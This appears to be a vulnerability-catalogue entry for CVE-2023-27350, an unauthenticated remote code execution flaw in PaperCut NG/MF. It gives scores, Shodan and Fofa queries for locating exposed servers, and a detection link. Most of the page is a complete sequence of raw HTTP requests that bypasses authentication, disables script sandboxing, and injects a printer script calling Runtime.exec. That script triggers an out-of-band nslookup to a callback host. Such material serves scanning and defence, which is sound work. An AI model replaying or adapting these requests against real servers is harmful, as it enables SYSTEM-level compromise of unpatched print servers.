| Title | PaperCut - Unauthenticated Remote Code Execution |
|---|---|
| Author | rootxharsh,iamnoooob,pdresearch |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. |
| Remediation | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94257 |
| CVE ID | CVE-2023-27350 |
| CWE ID | CWE-284,NVD-CWE-Other |
| Shodan Query | http.html:"PaperCut"http.html:"papercut"http.html:"content=\"papercut\""cpe:"cpe:2.3:a:papercut:papercut_mf" |
| Fofa Query | body="papercut"body="content=\"papercut\"" |
| Tags | cve2023 cve packetstorm papercut rce oast unauth kev vkev vuln |
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
GET /app?service=page/SetupCompleted HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2 rv:2.0; mai-IN) AppleWebKit/533.27.1 (KHTML, like Gecko) Version/5.0 Safari/533.27.1
Connection: close
Accept-Encoding: gzip
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.19
Connection: close
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 156
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Content-Length: 147
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update
GET /app?service=page/PrinterList HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=page%2FPrinterList
POST /app?service=direct/1/PrinterList/selectPrinter&sp=evVa49 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FPrinterList%2FselectPrinter&sp=evVa49
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4
POST /app HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10.15, rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Content-Length: 401
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Accept-Encoding: gzip
service=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId=evVa49&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup d5jkod1le0o36j101bqgqjin9zw8gpfcz.oast.live%27%29%3B&%24Submit%241=Apply
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-27350.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-27350.pcap
N/AN/A